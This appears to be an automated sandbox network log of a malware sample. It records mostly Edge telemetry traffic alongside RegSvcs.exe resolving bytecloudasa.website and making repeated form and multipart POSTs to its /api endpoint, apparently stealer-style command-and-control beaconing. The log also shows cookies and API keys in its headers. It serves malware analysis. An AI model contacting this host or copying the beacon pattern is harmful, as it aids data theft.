access-control-allow-origin: https://learn.microsoft.com
date: Tue, 10 Oct 2023 17:36:05 GMT
DNS

8.179.89.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.179.89.13.in-addr.arpa

IN PTR

Response
DNS

bytecloudasa.website

RegSvcs.exe

Remote address:

8.8.8.8:53

Request

bytecloudasa.website

IN A

Response

bytecloudasa.website

IN A

104.21.61.162

bytecloudasa.website

IN A

172.67.212.39
POST

https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&w=0

msedge.exe

Remote address:

13.89.179.8:443

Request

POST /OneCollector/1.0/?cors=true&content-type=application/x-json-stream&w=0 HTTP/2.0
host: browser.events.data.microsoft.com
content-length: 3733
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
upload-time: 1696959360147
dnt: 1
sec-ch-ua-mobile: ?0
client-version: 1DS-Web-JS-3.2.14
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
time-delta-to-apply-millis: use-collector-delta
content-type: application/x-json-stream
cache-control: no-cache, no-store
apikey: c6c27850c9c24cbfae921778d2465031-4c28c161-db47-426b-9d28-733d45d05dd9-7278
client-id: NO_AUTH
accept: */*
origin: https://learn.microsoft.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://learn.microsoft.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 153
content-type: application/json
server: Microsoft-HTTPAPI/2.0
strict-transport-security: max-age=31536000
p3p: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
set-cookie: MC1=GUID=c3549a94b71b4fa8ad2e02b24e084cc1&HASH=c354&LV=202310&V=4&LU=1696959362094; Domain=.microsoft.com; Expires=Wed, 09 Oct 2024 17:36:02 GMT; Path=/;Secure; SameSite=None
set-cookie: MS0=3d26e2338d4e466d83ce421db9f1e13b; Domain=.microsoft.com; Expires=Tue, 10 Oct 2023 18:06:02 GMT; Path=/;Secure; SameSite=None
time-delta-millis: 1947
access-control-allow-headers: P3P,Set-Cookie,time-delta-millis
access-control-allow-methods: POST
access-control-allow-credentials: true
access-control-allow-origin: https://learn.microsoft.com
access-control-expose-headers: time-delta-millis
date: Tue, 10 Oct 2023 17:36:01 GMT
POST

https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&w=0

msedge.exe

Remote address:

13.89.179.8:443

Request

POST /OneCollector/1.0/?cors=true&content-type=application/x-json-stream&w=0 HTTP/2.0
host: browser.events.data.microsoft.com
content-length: 3901
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
upload-time: 1696959361163
dnt: 1
sec-ch-ua-mobile: ?0
client-version: 1DS-Web-JS-3.2.14
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
time-delta-to-apply-millis: 1947
content-type: application/x-json-stream
cache-control: no-cache, no-store
apikey: c6c27850c9c24cbfae921778d2465031-4c28c161-db47-426b-9d28-733d45d05dd9-7278
client-id: NO_AUTH
accept: */*
origin: https://learn.microsoft.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://learn.microsoft.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MC1=GUID=c3549a94b71b4fa8ad2e02b24e084cc1&HASH=c354&LV=202310&V=4&LU=1696959362094
cookie: MS0=3d26e2338d4e466d83ce421db9f1e13b

Response

HTTP/2.0 200

content-length: 153
content-type: application/json
server: Microsoft-HTTPAPI/2.0
strict-transport-security: max-age=31536000
time-delta-millis: 1291
access-control-allow-headers: time-delta-millis
access-control-allow-methods: POST
access-control-allow-credentials: true
access-control-allow-origin: https://learn.microsoft.com
access-control-expose-headers: time-delta-millis
date: Tue, 10 Oct 2023 17:36:01 GMT
POST

https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.14&apikey=c6c27850c9c24cbfae921778d2465031-4c28c161-db47-426b-9d28-733d45d05dd9-7278&upload-time=1696959362949&time-delta-to-apply-millis=use-collector-delta&w=0&NoResponseBody=true

msedge.exe

Remote address:

13.89.179.8:443

Request

POST /OneCollector/1.0/?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.14&apikey=c6c27850c9c24cbfae921778d2465031-4c28c161-db47-426b-9d28-733d45d05dd9-7278&upload-time=1696959362949&time-delta-to-apply-millis=use-collector-delta&w=0&NoResponseBody=true HTTP/2.0
host: browser.events.data.microsoft.com
content-length: 1723
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://learn.microsoft.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://learn.microsoft.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MC1=GUID=c3549a94b71b4fa8ad2e02b24e084cc1&HASH=c354&LV=202310&V=4&LU=1696959362094
cookie: MS0=3d26e2338d4e466d83ce421db9f1e13b

Response

HTTP/2.0 204

content-length: 0
server: Microsoft-HTTPAPI/2.0
strict-transport-security: max-age=31536000
time-delta-millis: 1363
access-control-allow-headers: time-delta-millis
access-control-allow-methods: POST
access-control-allow-credentials: true
access-control-allow-origin: https://learn.microsoft.com
access-control-expose-headers: time-delta-millis
date: Tue, 10 Oct 2023 17:36:03 GMT
POST

https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.14&apikey=c6c27850c9c24cbfae921778d2465031-4c28c161-db47-426b-9d28-733d45d05dd9-7278&upload-time=1696959363777&ext.intweb.msfpc=GUID%3Dc3549a94b71b4fa8ad2e02b24e084cc1%26HASH%3Dc354%26LV%3D202310%26V%3D4%26LU%3D1696959362094&w=0&NoResponseBody=true

msedge.exe

Remote address:

13.89.179.8:443

Request

POST /OneCollector/1.0/?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.14&apikey=c6c27850c9c24cbfae921778d2465031-4c28c161-db47-426b-9d28-733d45d05dd9-7278&upload-time=1696959363777&ext.intweb.msfpc=GUID%3Dc3549a94b71b4fa8ad2e02b24e084cc1%26HASH%3Dc354%26LV%3D202310%26V%3D4%26LU%3D1696959362094&w=0&NoResponseBody=true HTTP/2.0
host: browser.events.data.microsoft.com
content-length: 1132
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://learn.microsoft.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://learn.microsoft.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MC1=GUID=c3549a94b71b4fa8ad2e02b24e084cc1&HASH=c354&LV=202310&V=4&LU=1696959362094
cookie: MS0=3d26e2338d4e466d83ce421db9f1e13b

Response

HTTP/2.0 204

content-length: 0
server: Microsoft-HTTPAPI/2.0
strict-transport-security: max-age=31536000
time-delta-millis: 1301
access-control-allow-headers: time-delta-millis
access-control-allow-methods: POST
access-control-allow-credentials: true
access-control-allow-origin: https://learn.microsoft.com
access-control-expose-headers: time-delta-millis
date: Tue, 10 Oct 2023 17:36:04 GMT
POST

https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.14&apikey=c6c27850c9c24cbfae921778d2465031-4c28c161-db47-426b-9d28-733d45d05dd9-7278&upload-time=1696959363972&ext.intweb.msfpc=GUID%3Dc3549a94b71b4fa8ad2e02b24e084cc1%26HASH%3Dc354%26LV%3D202310%26V%3D4%26LU%3D1696959362094&w=0&NoResponseBody=true

msedge.exe

Remote address:

13.89.179.8:443

Request

POST /OneCollector/1.0/?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.14&apikey=c6c27850c9c24cbfae921778d2465031-4c28c161-db47-426b-9d28-733d45d05dd9-7278&upload-time=1696959363972&ext.intweb.msfpc=GUID%3Dc3549a94b71b4fa8ad2e02b24e084cc1%26HASH%3Dc354%26LV%3D202310%26V%3D4%26LU%3D1696959362094&w=0&NoResponseBody=true HTTP/2.0
host: browser.events.data.microsoft.com
content-length: 2100
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://learn.microsoft.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://learn.microsoft.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MC1=GUID=c3549a94b71b4fa8ad2e02b24e084cc1&HASH=c354&LV=202310&V=4&LU=1696959362094
cookie: MS0=3d26e2338d4e466d83ce421db9f1e13b

Response

HTTP/2.0 204

content-length: 0
server: Microsoft-HTTPAPI/2.0
strict-transport-security: max-age=31536000
time-delta-millis: 1325
access-control-allow-headers: time-delta-millis
access-control-allow-methods: POST
access-control-allow-credentials: true
access-control-allow-origin: https://learn.microsoft.com
access-control-expose-headers: time-delta-millis
date: Tue, 10 Oct 2023 17:36:04 GMT
POST

https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.14&apikey=c6c27850c9c24cbfae921778d2465031-4c28c161-db47-426b-9d28-733d45d05dd9-7278&upload-time=1696959364446&ext.intweb.msfpc=GUID%3Dc3549a94b71b4fa8ad2e02b24e084cc1%26HASH%3Dc354%26LV%3D202310%26V%3D4%26LU%3D1696959362094&w=0&NoResponseBody=true

msedge.exe

Remote address:

13.89.179.8:443

Request

POST /OneCollector/1.0/?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.14&apikey=c6c27850c9c24cbfae921778d2465031-4c28c161-db47-426b-9d28-733d45d05dd9-7278&upload-time=1696959364446&ext.intweb.msfpc=GUID%3Dc3549a94b71b4fa8ad2e02b24e084cc1%26HASH%3Dc354%26LV%3D202310%26V%3D4%26LU%3D1696959362094&w=0&NoResponseBody=true HTTP/2.0
host: browser.events.data.microsoft.com
content-length: 2232
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://learn.microsoft.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://learn.microsoft.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MC1=GUID=c3549a94b71b4fa8ad2e02b24e084cc1&HASH=c354&LV=202310&V=4&LU=1696959362094
cookie: MS0=3d26e2338d4e466d83ce421db9f1e13b

Response

HTTP/2.0 204

content-length: 0
server: Microsoft-HTTPAPI/2.0
strict-transport-security: max-age=31536000
time-delta-millis: 1288
access-control-allow-headers: time-delta-millis
access-control-allow-methods: POST
access-control-allow-credentials: true
access-control-allow-origin: https://learn.microsoft.com
access-control-expose-headers: time-delta-millis
date: Tue, 10 Oct 2023 17:36:04 GMT
POST

https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.14&apikey=c6c27850c9c24cbfae921778d2465031-4c28c161-db47-426b-9d28-733d45d05dd9-7278&upload-time=1696959364473&ext.intweb.msfpc=GUID%3Dc3549a94b71b4fa8ad2e02b24e084cc1%26HASH%3Dc354%26LV%3D202310%26V%3D4%26LU%3D1696959362094&w=0&NoResponseBody=true

msedge.exe

Remote address:

13.89.179.8:443

Request

POST /OneCollector/1.0/?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.14&apikey=c6c27850c9c24cbfae921778d2465031-4c28c161-db47-426b-9d28-733d45d05dd9-7278&upload-time=1696959364473&ext.intweb.msfpc=GUID%3Dc3549a94b71b4fa8ad2e02b24e084cc1%26HASH%3Dc354%26LV%3D202310%26V%3D4%26LU%3D1696959362094&w=0&NoResponseBody=true HTTP/2.0
host: browser.events.data.microsoft.com
content-length: 2059
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://learn.microsoft.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://learn.microsoft.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MC1=GUID=c3549a94b71b4fa8ad2e02b24e084cc1&HASH=c354&LV=202310&V=4&LU=1696959362094
cookie: MS0=3d26e2338d4e466d83ce421db9f1e13b

Response

HTTP/2.0 204

content-length: 0
server: Microsoft-HTTPAPI/2.0
strict-transport-security: max-age=31536000
time-delta-millis: 1308
access-control-allow-headers: time-delta-millis
access-control-allow-methods: POST
access-control-allow-credentials: true
access-control-allow-origin: https://learn.microsoft.com
access-control-expose-headers: time-delta-millis
date: Tue, 10 Oct 2023 17:36:04 GMT
POST

https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.14&apikey=c6c27850c9c24cbfae921778d2465031-4c28c161-db47-426b-9d28-733d45d05dd9-7278&upload-time=1696959364494&ext.intweb.msfpc=GUID%3Dc3549a94b71b4fa8ad2e02b24e084cc1%26HASH%3Dc354%26LV%3D202310%26V%3D4%26LU%3D1696959362094&w=0&NoResponseBody=true

msedge.exe

Remote address:

13.89.179.8:443

Request

POST /OneCollector/1.0/?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.14&apikey=c6c27850c9c24cbfae921778d2465031-4c28c161-db47-426b-9d28-733d45d05dd9-7278&upload-time=1696959364494&ext.intweb.msfpc=GUID%3Dc3549a94b71b4fa8ad2e02b24e084cc1%26HASH%3Dc354%26LV%3D202310%26V%3D4%26LU%3D1696959362094&w=0&NoResponseBody=true HTTP/2.0
host: browser.events.data.microsoft.com
content-length: 2093
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://learn.microsoft.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://learn.microsoft.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MC1=GUID=c3549a94b71b4fa8ad2e02b24e084cc1&HASH=c354&LV=202310&V=4&LU=1696959362094
cookie: MS0=3d26e2338d4e466d83ce421db9f1e13b

Response

HTTP/2.0 204

content-length: 0
server: Microsoft-HTTPAPI/2.0
strict-transport-security: max-age=31536000
time-delta-millis: 1287
access-control-allow-headers: time-delta-millis
access-control-allow-methods: POST
access-control-allow-credentials: true
access-control-allow-origin: https://learn.microsoft.com
access-control-expose-headers: time-delta-millis
date: Tue, 10 Oct 2023 17:36:04 GMT
POST

https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dc3549a94b71b4fa8ad2e02b24e084cc1%26HASH%3Dc354%26LV%3D202310%26V%3D4%26LU%3D1696959362094&w=0

msedge.exe

Remote address:

13.89.179.8:443

Request

POST /OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dc3549a94b71b4fa8ad2e02b24e084cc1%26HASH%3Dc354%26LV%3D202310%26V%3D4%26LU%3D1696959362094&w=0 HTTP/2.0
host: browser.events.data.microsoft.com
content-length: 2058
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
upload-time: 1696959364582
dnt: 1
sec-ch-ua-mobile: ?0
client-version: 1DS-Web-JS-3.2.14
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
time-delta-to-apply-millis: 1947
content-type: application/x-json-stream
cache-control: no-cache, no-store
apikey: c6c27850c9c24cbfae921778d2465031-4c28c161-db47-426b-9d28-733d45d05dd9-7278
client-id: NO_AUTH
accept: */*
origin: https://learn.microsoft.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://learn.microsoft.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MC1=GUID=c3549a94b71b4fa8ad2e02b24e084cc1&HASH=c354&LV=202310&V=4&LU=1696959362094
cookie: MS0=3d26e2338d4e466d83ce421db9f1e13b

Response

HTTP/2.0 200

content-length: 24
content-type: application/json
server: Microsoft-HTTPAPI/2.0
strict-transport-security: max-age=31536000
time-delta-millis: 1481
access-control-allow-headers: time-delta-millis
access-control-allow-methods: POST
access-control-allow-credentials: true
access-control-allow-origin: https://learn.microsoft.com
access-control-expose-headers: time-delta-millis
date: Tue, 10 Oct 2023 17:36:05 GMT
POST

https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dc3549a94b71b4fa8ad2e02b24e084cc1%26HASH%3Dc354%26LV%3D202310%26V%3D4%26LU%3D1696959362094&w=0

msedge.exe

Remote address:

13.89.179.8:443

Request

POST /OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dc3549a94b71b4fa8ad2e02b24e084cc1%26HASH%3Dc354%26LV%3D202310%26V%3D4%26LU%3D1696959362094&w=0 HTTP/2.0
host: browser.events.data.microsoft.com
content-length: 2097
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
upload-time: 1696959367314
dnt: 1
sec-ch-ua-mobile: ?0
client-version: 1DS-Web-JS-3.2.14
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/x-json-stream
cache-control: no-cache, no-store
apikey: c6c27850c9c24cbfae921778d2465031-4c28c161-db47-426b-9d28-733d45d05dd9-7278
client-id: NO_AUTH
accept: */*
origin: https://learn.microsoft.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://learn.microsoft.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MC1=GUID=c3549a94b71b4fa8ad2e02b24e084cc1&HASH=c354&LV=202310&V=4&LU=1696959362094
cookie: MS0=3d26e2338d4e466d83ce421db9f1e13b

Response

HTTP/2.0 200

content-length: 24
content-type: application/json
server: Microsoft-HTTPAPI/2.0
strict-transport-security: max-age=31536000
time-delta-millis: 1577
access-control-allow-headers: time-delta-millis
access-control-allow-methods: POST
access-control-allow-credentials: true
access-control-allow-origin: https://learn.microsoft.com
access-control-expose-headers: time-delta-millis
date: Tue, 10 Oct 2023 17:36:07 GMT
POST

https://browser.events.data.microsoft.com/OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dc3549a94b71b4fa8ad2e02b24e084cc1%26HASH%3Dc354%26LV%3D202310%26V%3D4%26LU%3D1696959362094&w=0

msedge.exe

Remote address:

13.89.179.8:443

Request

POST /OneCollector/1.0/?cors=true&content-type=application/x-json-stream&ext.intweb.msfpc=GUID%3Dc3549a94b71b4fa8ad2e02b24e084cc1%26HASH%3Dc354%26LV%3D202310%26V%3D4%26LU%3D1696959362094&w=0 HTTP/2.0
host: browser.events.data.microsoft.com
content-length: 1943
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
upload-time: 1696959368386
dnt: 1
sec-ch-ua-mobile: ?0
client-version: 1DS-Web-JS-3.2.14
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
time-delta-to-apply-millis: 1577
content-type: application/x-json-stream
cache-control: no-cache, no-store
apikey: c6c27850c9c24cbfae921778d2465031-4c28c161-db47-426b-9d28-733d45d05dd9-7278
client-id: NO_AUTH
accept: */*
origin: https://learn.microsoft.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://learn.microsoft.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MC1=GUID=c3549a94b71b4fa8ad2e02b24e084cc1&HASH=c354&LV=202310&V=4&LU=1696959362094
cookie: MS0=3d26e2338d4e466d83ce421db9f1e13b

Response

HTTP/2.0 200

content-length: 24
content-type: application/json
server: Microsoft-HTTPAPI/2.0
strict-transport-security: max-age=31536000
time-delta-millis: 1380
access-control-allow-headers: time-delta-millis
access-control-allow-methods: POST
access-control-allow-credentials: true
access-control-allow-origin: https://learn.microsoft.com
access-control-expose-headers: time-delta-millis
date: Tue, 10 Oct 2023 17:36:08 GMT
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 8
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 17:36:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=X0uruhg1UkeCc0k9eEpYH%2FFcHgEDMN5a%2Bs4pzMPNUNHPQjMdHksVS6DXTLQaXjWeT%2F8UstxCU47TdQx3UudkN5J51NldENUXbS%2BmloS4gIwxpM8MCqzvNyaMsTskEpkdMx5wVdtSkw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 81409f8b4e51b88e-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=saTG5JXDVebwvcMtHzrcJZqAtw4tByJlLvkPbZP3xIo-1696959361-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 17:36:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=p71nnics8vs4vp057jimcjm6ui; expires=Sat, 03 Feb 2024 11:22:46 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 17:36:07 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YixgFqWpsSptH8dcXJ7sny%2FWUa4KCWsAEfK67t8%2BX38679nxX%2BK%2FcI5SMgAc7bj6smkg%2FjJwVUMEhNzRE8FxBAS2cFFjk2HnkznAuETX80ECVW5pAHzABtBMpObYv%2Fw167B%2BSGk9Yw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 81409f8e591db88e-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Cookie: __cf_mw_byp=saTG5JXDVebwvcMtHzrcJZqAtw4tByJlLvkPbZP3xIo-1696959361-0-/api
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Host: bytecloudasa.website
Content-Length: 56
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 17:36:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=aidfh80rcmpohitsji8u02g971; expires=Sat, 03 Feb 2024 11:22:41 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 17:36:02 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zoFelyL%2BO08nBiXFlTxKj%2BxZG3Gg12UDSzSV2qqUAkZ%2FOofiTPQfhml6UFZqX2I7VlatJekdbQJN%2FPCZ86G1C7Ap%2F5jisF2Eo3%2B0QQfab0FETSIpaNHBGdNwgZMs9kA%2BoW%2BgZ45g8Q%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 81409f8c3e5b0b5e-AMS
DNS

162.61.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

162.61.21.104.in-addr.arpa

IN PTR

Response
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

104.21.61.162:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=saTG5JXDVebwvcMtHzrcJZqAtw4tByJlLvkPbZP3xIo-1696959361-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 17:36:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=nl94sbav08uf9b0bht05mephcg; expires=Sat, 03 Feb 2024 11:22:46 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 17:36:07 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
